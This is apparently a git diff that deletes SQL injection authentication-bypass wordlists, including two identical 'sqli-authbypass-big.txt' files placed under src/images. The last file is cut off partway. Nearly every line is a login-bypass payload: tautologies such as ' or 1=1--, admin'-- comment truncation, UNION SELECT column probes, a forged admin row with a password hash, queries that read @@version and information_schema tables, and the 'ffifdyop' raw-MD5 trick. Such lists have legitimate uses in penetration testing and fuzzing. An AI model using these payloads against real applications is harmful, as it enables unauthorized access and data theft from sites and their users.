-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (2).txt b/src/images/sqli-authbypass-big (2).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (2).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big.txt b/src/images/sqli-authbypass-big.txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big.txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
